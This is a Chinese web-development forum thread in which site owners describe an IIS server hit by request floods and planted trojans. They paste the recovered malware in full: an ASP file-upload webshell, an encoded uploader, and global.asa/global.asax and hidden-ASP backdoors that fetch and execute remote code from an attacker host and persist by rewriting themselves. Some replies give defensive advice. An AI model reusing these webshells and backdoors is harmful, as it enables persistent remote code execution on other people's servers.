62,046
社区成员
发帖
与我相关
我的任务
分享高分求救,服务器被攻击?
这是iis日志,韩国的ip一直在刷服务器。每天的iis日志都有1G大。
下面是360网络链接的监控看到的
前两天网站images目录下被植入几个木马文件,第一次删了以后第二天又来了
后来我用McAfee设置了images文件夹的写入规则,已经植入不了
然而就一直刷我们服务器
他们是通过什么方式,这要怎么解决?
下面是360网络链接的监控看到的
前两天网站images目录下被植入几个木马文件,第一次删了以后第二天又来了
后来我用McAfee设置了images文件夹的写入规则,已经植入不了
然而就一直刷我们服务器
他们是通过什么方式,这要怎么解决?
...全文
请发表友善的回复…
发表回复
valen926 2010-12-21
- 打赏
- 举报
我的网站没什么问题了,换了一台重新设置好的服务器
就是每天访问网站IIS日志都有60MB左右,没什么大碍
下面是访问记录:
2010-12-21 00:00:04 W3SVC991063922 120.35.*.* GET /images/pic.js - 80 - 121.169.6.250 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+InfoPath.2) 404 0 2
这样的记录N多条,重复访问pic.js 文件早就没了 呵呵
就是每天访问网站IIS日志都有60MB左右,没什么大碍
下面是访问记录:
2010-12-21 00:00:04 W3SVC991063922 120.35.*.* GET /images/pic.js - 80 - 121.169.6.250 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+InfoPath.2) 404 0 2
这样的记录N多条,重复访问pic.js 文件早就没了 呵呵
雾草一波 2010-12-16
- 打赏
- 举报
楼上的,我和你一样,不过我这里的global.asa和asax 是一直更新的。代码和你的一样。nnd气人啊
求救啊
求救啊
xiaogug01 2010-12-10
- 打赏
- 举报
问题解决了吗? 我这也是这样的情况。被植入的文件都基本相同。
<%
Name="萧萧技术学院专用小马" '名字
Copyright="{交流黑客技术|共享黑客资源}" '版权
url="http://lixiao594210.ys168.com" '网址
imgurl="http://p7.images22.51img1.com/6000/god7girl7/7f1718b7d09d22cb0957f1ef93f8873d.gif" '图片
Sub RRS(str):response.write(str):End Sub
RRS"<STYLE>td {font-size: 9pt;line-height: 1.5;text-decoration: none;color: #FFFFFF;}"
RRS"a:link {color: #FFFFFF;text-decoration: none;}"
RRS"a:active {color: #0099FF;text-decoration: underline overline;}"
RRS"a:visited {color: #CCCCCC;text-decoration: none;}"
RRS"a:hover {color: #FF0000;text-decoration: underline;}</STYLE>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>萧萧技术学院专用小马</title>"
dim objFSO,fdata,objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then response.write "<font color=red>保存成功!</font>"
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
response.write "<br>"
response.write "本文件绝对路径"
server.mappath(request.servervariables("script_name"))
response.write "<br>"
RRS"<body bgcolor=""#000000""><div align=""center"">"
RRS" <table width=""540"" border=""0"" cellpadding=""2"" cellspacing=""1"" bgcolor=""#CCCCCC"">"
RRS" <tr> "
RRS" <td height=""151"" align=""center"" bgcolor=""#000000""><img src="&imgurl&"></td>"
RRS" </tr>"
RRS" <tr> "
RRS" <td align=""center"" bgcolor=""#000000""><a href="&url&"><font color=""#FFFFFF"" class=>"&Name&"</font></a></td>"
RRS" </tr>"
RRS" <tr> "
RRS" <td align=""center"" bgcolor=""#000000""><form method=post>"
RRS" <table width=""95%"" border=""0"" cellpadding=""3"" cellspacing=""1"" bgcolor=""#999999"">"
RRS" <tr> "
RRS" <td width=""80%"" bgcolor=""#000000""><input type=text name=syfdpath value="&server.mappath("dama.asp")&" size=60></td>"
RRS" <td bgcolor=""#000000""><input name=""submit"" type=submit value=""保存""></td>"
RRS" </tr>"
RRS" <tr> "
RRS" <td colspan=""2"" bgcolor=""#000000""><textarea name=cyfddata cols=80 rows=10 width=32></textarea></td>"
RRS" </tr>"
RRS" </table>"
RRS" </form></td>"
RRS" </tr>"
RRS" <tr>"
RRS" <td align=""center"" bgcolor=""#000000""><font color=""#FFFFFF"">"©right&"</font></td>"
RRS" </tr>"
RRS" </table>"
RRS"</div>"
RRS"</div>"%>
还有这个
<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>旁注 - 网站小助手</title>
<style type="text/css">
<!--
.black {
font-family: "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
line-height: 120%;}
-->
</style>
<style type="text/css">
<!--
a:link {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:visited {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:hover {
font-family: "宋体";
font-size: 12px;
color: #333333;
text-decoration: none;
}
-->
</style>
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>
<%#@~^DAAAAA==~9kh,W(LsUr,vQMAAA==^#~@%>
<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
<%#@~^EgAAAA==~9kh,W(LZKE OsbVnPXgYAAA==^#~@%>
<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
<%#@~^QAAAAA==~U+O,W(LsUr,xPU+.\D /M+lDnr(L+1OcJUmMk2YrUTRok^n?H/Onsr4%n1YE#,ThYAAA==^#~@%>
<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+ PqgwAAA==^#~@%>
<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
<%#@~^QgAAAA==~U+O,W(LZKE OsbVn'K4%oUrR;.+mY+:naYwk^+cDn5!+dYvE/H0[2mYtEbBK.Eb,dRcAAA==^#~@%>
<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
<%#@~^EAAAAA==~b0~DMP'ZPD4+ P1AQAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存成功e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存失败e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
<%#@~^GgAAAA==~U+O,W(LZKE OsbVn'gWO4bxo,ZAkAAA==^#~@%>
<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
<%#@~^HAAAAA==~"+daW /+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>
</p>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
<tr>
<td height="100%">
<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<td bgcolor="#FFFFFF"><span class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE本文件绝对的路径J,TAYAAA==^#~@%>
<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
<br>
<%#@~^TQAAAA==~"+daW /+chMrYPE保存文件的@!6WUO,mW^GD{D+9@*绝对路径c包括文件名)如G)'hn4wacldw*l@!J0GUD@*J~txMAAA==^#~@%>
<%#@~^MwAAAA==~"+daW /+chMrYPE@!6W.h,lmDrW 'BEvvPs+DtGNx2K/O@*r~lRAAAA==^#~@%>
</span> </td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="black">输入保存的路径:<%#@~^RgAAAA==~"+daW /+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4xy!!~dbyn'Rq@*J~qxcAAA==^#~@%>
</span></td>
</tr>
<tr>
<td bgcolor="#FFFFFF" class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE输入文件的内容:J,TAYAAA==^#~@%>
<%#@~^UwAAAA==~"+daW /+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><div align="center"><span class="black">
<%#@~^MQAAAA==~"+daW /+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x保存@*rPIxAAAA==^#~@%>
</span></div></td>
</tr>
</tr>
<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
。我还发现他在我的网站根目录建立了两个asp.net和asp启动时加载的文件。global.asax和global.asa。
global.asa:
<script language="vbscript" runat="server">
'by-aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
On Error Resume Next
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"_"&"l"&"o"&"a"&"d"&"."&"t"&"x"&"t"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
if instr(GetHtml,"by-aming")>0 then
execute GetHtml
end if
end sub
sub Session_OnEnd
end sub
</script>
global.asax:
<%@ Language="VB"%><%@ Import Namespace="System.IO"%><script language="VB" runat="server">
Sub Session_Start()
'by-aming
dim url1,url2,ObjXMLHTTP,CODE1,CODE2
url1="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"_"&"a"&"s"&"a"&"x"&"."&"t"&"x"&"t"
url2="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"t"&"x"&"t"
ObjXMLHTTP=CreateObject("Microsoft.XMLHTTP")
ObjXMLHTTP.Open("GET",url1,False)
ObjXMLHTTP.setRequestHeader("User-Agent",url1)
ObjXMLHTTP.send
CODE1=ObjXMLHTTP.responseText
ObjXMLHTTP = Nothing
ObjXMLHTTP=CreateObject("Microsoft.XMLHTTP")
ObjXMLHTTP.Open("GET",url2,False)
ObjXMLHTTP.setRequestHeader("User-Agent",url2)
ObjXMLHTTP.send
CODE2=ObjXMLHTTP.responseText
ObjXMLHTTP = Nothing
if instr(CODE1,"by-aming")>0 and instr(CODE2,"by-aming")>0 then
dim fso,f
dim objwriter As StreamWriter
fso = Server.CreateObject("scripting.filesystemobject")
if fso.FileExists("\\.\"&Server.MapPath("/global.asax")) then
f=fso.Getfile("\\.\"&Server.MapPath("/global.asax"))
f.Attributes=0
objwriter= File.CreateText(server.mappath("/global.asax"))
objwriter.write(CODE1)
objwriter.close
f.Attributes=1+2+4
f=Nothing
end if
if fso.FileExists("\\.\"&Server.MapPath("/global.asa")) then
f=fso.Getfile("\\.\"&Server.MapPath("/global.asa"))
f.Attributes=0
objwriter= File.CreateText(server.mappath("/global.asa"))
objwriter.write(CODE2)
objwriter.close
f.Attributes=1+2+4
f=Nothing
end if
fso = Nothing
objwriter = Nothing
end if
dim geturl
geturl=LCase(Request.Url.ToString())
if instr(geturl,"amjcdm=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.aspx")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/default.aspx")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
response.write("<h1>Service Unavailable</h1><div style=""display:none""><"&"script src=""http://js.users.51.la/4096921.js""><"&"/script></div>")
response.end
End if
End Sub
</script>
好像是asp的global.asa,是把asp页面都转到其他页面。aspx的global.asax,把aspx页面地址包含amjcdm=ok gov.cn edu.cn /index.aspx /default.aspx等的都正常加载。其他的都显示Service Unavailable。
vb没搞过。不是很明白。好像有不少中这个木马的网站。
<%
Name="萧萧技术学院专用小马" '名字
Copyright="{交流黑客技术|共享黑客资源}" '版权
url="http://lixiao594210.ys168.com" '网址
imgurl="http://p7.images22.51img1.com/6000/god7girl7/7f1718b7d09d22cb0957f1ef93f8873d.gif" '图片
Sub RRS(str):response.write(str):End Sub
RRS"<STYLE>td {font-size: 9pt;line-height: 1.5;text-decoration: none;color: #FFFFFF;}"
RRS"a:link {color: #FFFFFF;text-decoration: none;}"
RRS"a:active {color: #0099FF;text-decoration: underline overline;}"
RRS"a:visited {color: #CCCCCC;text-decoration: none;}"
RRS"a:hover {color: #FF0000;text-decoration: underline;}</STYLE>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>萧萧技术学院专用小马</title>"
dim objFSO,fdata,objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then response.write "<font color=red>保存成功!</font>"
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
response.write "<br>"
response.write "本文件绝对路径"
server.mappath(request.servervariables("script_name"))
response.write "<br>"
RRS"<body bgcolor=""#000000""><div align=""center"">"
RRS" <table width=""540"" border=""0"" cellpadding=""2"" cellspacing=""1"" bgcolor=""#CCCCCC"">"
RRS" <tr> "
RRS" <td height=""151"" align=""center"" bgcolor=""#000000""><img src="&imgurl&"></td>"
RRS" </tr>"
RRS" <tr> "
RRS" <td align=""center"" bgcolor=""#000000""><a href="&url&"><font color=""#FFFFFF"" class=>"&Name&"</font></a></td>"
RRS" </tr>"
RRS" <tr> "
RRS" <td align=""center"" bgcolor=""#000000""><form method=post>"
RRS" <table width=""95%"" border=""0"" cellpadding=""3"" cellspacing=""1"" bgcolor=""#999999"">"
RRS" <tr> "
RRS" <td width=""80%"" bgcolor=""#000000""><input type=text name=syfdpath value="&server.mappath("dama.asp")&" size=60></td>"
RRS" <td bgcolor=""#000000""><input name=""submit"" type=submit value=""保存""></td>"
RRS" </tr>"
RRS" <tr> "
RRS" <td colspan=""2"" bgcolor=""#000000""><textarea name=cyfddata cols=80 rows=10 width=32></textarea></td>"
RRS" </tr>"
RRS" </table>"
RRS" </form></td>"
RRS" </tr>"
RRS" <tr>"
RRS" <td align=""center"" bgcolor=""#000000""><font color=""#FFFFFF"">"©right&"</font></td>"
RRS" </tr>"
RRS" </table>"
RRS"</div>"
RRS"</div>"%>
还有这个
<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>旁注 - 网站小助手</title>
<style type="text/css">
<!--
.black {
font-family: "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
line-height: 120%;}
-->
</style>
<style type="text/css">
<!--
a:link {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:visited {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:hover {
font-family: "宋体";
font-size: 12px;
color: #333333;
text-decoration: none;
}
-->
</style>
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>
<%#@~^DAAAAA==~9kh,W(LsUr,vQMAAA==^#~@%>
<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
<%#@~^EgAAAA==~9kh,W(LZKE OsbVnPXgYAAA==^#~@%>
<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
<%#@~^QAAAAA==~U+O,W(LsUr,xPU+.\D /M+lDnr(L+1OcJUmMk2YrUTRok^n?H/Onsr4%n1YE#,ThYAAA==^#~@%>
<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+ PqgwAAA==^#~@%>
<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
<%#@~^QgAAAA==~U+O,W(LZKE OsbVn'K4%oUrR;.+mY+:naYwk^+cDn5!+dYvE/H0[2mYtEbBK.Eb,dRcAAA==^#~@%>
<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
<%#@~^EAAAAA==~b0~DMP'ZPD4+ P1AQAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存成功e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存失败e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
<%#@~^GgAAAA==~U+O,W(LZKE OsbVn'gWO4bxo,ZAkAAA==^#~@%>
<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
<%#@~^HAAAAA==~"+daW /+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>
</p>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
<tr>
<td height="100%">
<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<td bgcolor="#FFFFFF"><span class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE本文件绝对的路径J,TAYAAA==^#~@%>
<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
<br>
<%#@~^TQAAAA==~"+daW /+chMrYPE保存文件的@!6WUO,mW^GD{D+9@*绝对路径c包括文件名)如G)'hn4wacldw*l@!J0GUD@*J~txMAAA==^#~@%>
<%#@~^MwAAAA==~"+daW /+chMrYPE@!6W.h,lmDrW 'BEvvPs+DtGNx2K/O@*r~lRAAAA==^#~@%>
</span> </td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="black">输入保存的路径:<%#@~^RgAAAA==~"+daW /+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4xy!!~dbyn'Rq@*J~qxcAAA==^#~@%>
</span></td>
</tr>
<tr>
<td bgcolor="#FFFFFF" class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE输入文件的内容:J,TAYAAA==^#~@%>
<%#@~^UwAAAA==~"+daW /+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><div align="center"><span class="black">
<%#@~^MQAAAA==~"+daW /+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x保存@*rPIxAAAA==^#~@%>
</span></div></td>
</tr>
</tr>
<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
。我还发现他在我的网站根目录建立了两个asp.net和asp启动时加载的文件。global.asax和global.asa。
global.asa:
<script language="vbscript" runat="server">
'by-aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
On Error Resume Next
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"_"&"l"&"o"&"a"&"d"&"."&"t"&"x"&"t"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
if instr(GetHtml,"by-aming")>0 then
execute GetHtml
end if
end sub
sub Session_OnEnd
end sub
</script>
global.asax:
<%@ Language="VB"%><%@ Import Namespace="System.IO"%><script language="VB" runat="server">
Sub Session_Start()
'by-aming
dim url1,url2,ObjXMLHTTP,CODE1,CODE2
url1="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"_"&"a"&"s"&"a"&"x"&"."&"t"&"x"&"t"
url2="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"t"&"x"&"t"
ObjXMLHTTP=CreateObject("Microsoft.XMLHTTP")
ObjXMLHTTP.Open("GET",url1,False)
ObjXMLHTTP.setRequestHeader("User-Agent",url1)
ObjXMLHTTP.send
CODE1=ObjXMLHTTP.responseText
ObjXMLHTTP = Nothing
ObjXMLHTTP=CreateObject("Microsoft.XMLHTTP")
ObjXMLHTTP.Open("GET",url2,False)
ObjXMLHTTP.setRequestHeader("User-Agent",url2)
ObjXMLHTTP.send
CODE2=ObjXMLHTTP.responseText
ObjXMLHTTP = Nothing
if instr(CODE1,"by-aming")>0 and instr(CODE2,"by-aming")>0 then
dim fso,f
dim objwriter As StreamWriter
fso = Server.CreateObject("scripting.filesystemobject")
if fso.FileExists("\\.\"&Server.MapPath("/global.asax")) then
f=fso.Getfile("\\.\"&Server.MapPath("/global.asax"))
f.Attributes=0
objwriter= File.CreateText(server.mappath("/global.asax"))
objwriter.write(CODE1)
objwriter.close
f.Attributes=1+2+4
f=Nothing
end if
if fso.FileExists("\\.\"&Server.MapPath("/global.asa")) then
f=fso.Getfile("\\.\"&Server.MapPath("/global.asa"))
f.Attributes=0
objwriter= File.CreateText(server.mappath("/global.asa"))
objwriter.write(CODE2)
objwriter.close
f.Attributes=1+2+4
f=Nothing
end if
fso = Nothing
objwriter = Nothing
end if
dim geturl
geturl=LCase(Request.Url.ToString())
if instr(geturl,"amjcdm=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.aspx")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/default.aspx")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
response.write("<h1>Service Unavailable</h1><div style=""display:none""><"&"script src=""http://js.users.51.la/4096921.js""><"&"/script></div>")
response.end
End if
End Sub
</script>
好像是asp的global.asa,是把asp页面都转到其他页面。aspx的global.asax,把aspx页面地址包含amjcdm=ok gov.cn edu.cn /index.aspx /default.aspx等的都正常加载。其他的都显示Service Unavailable。
vb没搞过。不是很明白。好像有不少中这个木马的网站。
datahandler2 2010-12-03
- 打赏
- 举报
写个同IP访问过频繁的就禁Ip方法,倒可以临时解决下你说的问题。。。
yunsheng3835 2010-12-03
- 打赏
- 举报
[Quote=引用 25 楼 dragonsq1009 的回复:]
教你个简单的方法
域名指向 网 警 的网站 他会主动帮你解决的
[/Quote]
又一次受教了!!!
教你个简单的方法
域名指向 网 警 的网站 他会主动帮你解决的
[/Quote]
又一次受教了!!!
丶羊先生丶 2010-12-03
- 打赏
- 举报
我的问题类别选错了 借用一下本房
这是我的问题地址 :
http://topic.csdn.net/u/20101129/13/a6a3a5b8-6437-41fc-b97a-926df10030a5.html
谢谢
这是我的问题地址 :
http://topic.csdn.net/u/20101129/13/a6a3a5b8-6437-41fc-b97a-926df10030a5.html
谢谢
valen926 2010-12-03
- 打赏
- 举报
[Quote=引用 42 楼 hwbox 的回复:]
打开这个网页的时候,会调用你的这个网页在服务器端执行http://bots.zh-cn.cc:8080/code/main_code.txt中指定的代码。分析一下这个文件就可以知道对方想在你服务器上干什么了
[/Quote]
http://bots.zh-cn.cc:8080/code/main_code.txt
这是地址是从何而来的?
打开这个网页的时候,会调用你的这个网页在服务器端执行http://bots.zh-cn.cc:8080/code/main_code.txt中指定的代码。分析一下这个文件就可以知道对方想在你服务器上干什么了
[/Quote]
http://bots.zh-cn.cc:8080/code/main_code.txt
这是地址是从何而来的?
hwbox 2010-12-03
- 打赏
- 举报
打开这个网页的时候,会调用你的这个网页在服务器端执行http://bots.zh-cn.cc:8080/code/main_code.txt中指定的代码。分析一下这个文件就可以知道对方想在你服务器上干什么了
z86823237 2010-12-02
- 打赏
- 举报
你这个好像是ASP一句话木马生成工具。。。。。。
别人那样刷你网页是CC攻击,不是DDOS。。。
我有个CC端口保护器,你加我QQ我发给你 QQ 355568052
别人那样刷你网页是CC攻击,不是DDOS。。。
我有个CC端口保护器,你加我QQ我发给你 QQ 355568052
valen926 2010-12-02
- 打赏
- 举报
<%
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by-aming
Function Gethtml(url)
Dim ObjXMLHTTP
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
Gethtml=BytesToBstr(Gethtml,"GB2312")
End Function
Function BytesToBstr(strBody,CodeBase)
dim objStream
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write strBody
objStream.Position = 0
objStream.Type = 2
objStream.Charset = CodeBase
BytesToBstr = objStream.ReadText
objStream.Close
set objStream = nothing
End Function
execute(GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"m"&"a"&"i"&"n"&"_"&"c"&"o"&"d"&"e"&"."&"t"&"x"&"t"))
'</body></html>
%>
刚才发现跟目录下有这个隐藏asp文件
大侠,研究一下这是干什么用?
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by-aming
Function Gethtml(url)
Dim ObjXMLHTTP
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
Gethtml=BytesToBstr(Gethtml,"GB2312")
End Function
